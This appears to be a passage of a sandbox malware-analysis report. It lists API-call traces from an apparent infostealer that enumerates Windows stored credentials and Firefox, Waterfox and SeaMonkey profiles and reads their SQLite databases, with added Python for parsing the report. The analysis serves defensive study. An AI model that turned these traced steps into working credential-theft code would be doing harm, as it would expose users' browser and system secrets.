                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 697348961-0
                                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                  • API String ID: 3527940856-11920434
                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                  • API String ID: 3527940856-2068335096
                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
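                                                                                                  The function blocks above (the BIN resource loader, the CredEnumerateW routine, and the Waterfox and SeaMonkey profile-path builders, which share the API hash 3527940856 and differ only in their strings) are easier to compare once parsed. The following Python is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses blocks in the listing's text layout (the regexes are assumptions about that layout), separates a function's own calls from "Part of subcall function" lines, clusters blocks by the API half of the "API String ID", and tags API combinations with what those Windows APIs do. REPORT_EXCERPT is a constructed excerpt of lines copied from this page.

```python
# Parse Joe Sandbox "IDA Plugin" function blocks and cluster them by API profile.
# Added example for this report page, not Joe Sandbox code. REPORT_EXCERPT is a
# constructed excerpt copied from the function listing on the page; the line layout
# the regexes expect (bullet, API.MODULE(args), ref: addr) is an assumption.
import re
from collections import defaultdict

REPORT_EXCERPT = r"""
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
Similarity
• API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
• String ID:
• API String ID: 697348961-0
APIs
• memset.MSVCRT ref: 00403CBF
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 3527940856-11920434
APIs
• memset.MSVCRT ref: 00403E50
Similarity
• API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 3527940856-2068335096
"""

# One API reference line; the optional "Part of subcall function X:" prefix marks
# calls the report attributes to a callee rather than to the function itself.
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*"
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_LINE = re.compile(r"^\s*[•*-]\s*(?P<key>API ID|String ID|API String ID):\s*(?P<val>.*?)\s*$")

def parse_blocks(text):
    """Split the listing into per-function blocks, one per 'APIs' header."""
    blocks = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append({"calls": [], "api_id": "", "strings": [], "api_hash": "", "string_hash": ""})
        elif not blocks:
            continue  # text before the first block is ignored
        elif (m := API_LINE.match(line)):
            blocks[-1]["calls"].append({"api": m["api"], "module": m["mod"], "ref": m["ref"],
                                        "args": m["args"].split(",") if m["args"] else [],
                                        "subcall_of": m["sub"]})
        elif (m := FIELD_LINE.match(line)):
            cur = blocks[-1]
            if m["key"] == "API ID":
                cur["api_id"] = m["val"]
            elif m["key"] == "String ID":
                cur["strings"] = [s for s in m["val"].split("$") if s]  # '$' separates strings
            else:  # "API String ID" is <hash of API set>-<hash of string set>
                cur["api_hash"], _, cur["string_hash"] = m["val"].partition("-")
    return blocks

def direct_calls(block):
    """API names the function calls itself, in listing order, excluding subcall lines."""
    return [c["api"] for c in block["calls"] if c["subcall_of"] is None]

# API combinations seen on this page and what they do per Microsoft's documentation.
TAG_RULES = [
    ({"FindResourceW", "LoadResource", "LockResource"}, "reads-embedded-PE-resource"),
    ({"CredEnumerateW"}, "enumerates-Windows-Credential-Manager"),
    ({"FindFirstUrlCacheEntryW", "FindNextUrlCacheEntryW"}, "walks-WinINet-URL-cache"),
]

def behaviour_tags(block):
    names = {c["api"] for c in block["calls"]}  # own calls and subcalls
    tags = [tag for needed, tag in TAG_RULES if needed <= names]
    if any(s.lower().endswith("\\profiles") for s in block["strings"]):
        tags.append("browser-profile-directory")
    return tags

def cluster_by_api_hash(blocks):
    """Blocks sharing an API hash are the same code template with different strings."""
    groups = defaultdict(list)
    for b in blocks:
        groups[b["api_hash"]].append(b)
    return dict(groups)
```

`parse_blocks(REPORT_EXCERPT)` yields four blocks; `cluster_by_api_hash` puts the Waterfox and SeaMonkey blocks together under 3527940856, which is how one profile-enumeration routine shows up once per browser in the listing, and `behaviour_tags` labels the resource loader and the credential-manager routine from their API sets alone.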
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                  • API String ID: 3527940856-3369679110
                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                  APIs
                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy
                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                  • String ID: $0.@
                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 2941347001-0
                                                                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                  • API String ID: 3249829328-1174173950
                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040A824
                                                                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                  • wcscpy.MSVCRT ref: 0040A854
                                                                                                  • wcscat.MSVCRT ref: 0040A86A
                                                                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 669240632-0
                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                  • String ID: "%s"
                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 2911713577-0
                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                  APIs
                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp
                                                                                                  • String ID: @ $SQLite format 3
                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                  • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                  • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
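The three memcmp calls in the function above (4 bytes, then the 16-byte "SQLite format 3" magic, then 3 bytes "@  ") correspond to the page-1 sanity checks SQLite performs when it opens a database, together with the "no such vfs: %s" / "BINARY" / "NOCASE" / "RTRIM" strings a few functions earlier: the payload statically links SQLite to read browser profile databases. The following is an added example, not code from the report or from the sample; it re-implements those header checks in Python so an analyst can recognise a SQLite file (for instance a carved cookies.sqlite) and see what each compare is testing. The sample headers are constructed inline and do not come from any real database.

```python
import struct

# SQLite 3 file header layout (first 100 bytes of page 1); offsets are those of
# the SQLite file-format documentation.
SQLITE_MAGIC = b"SQLite format 3\x00"      # offset 0, 16 bytes  -> 16-byte memcmp
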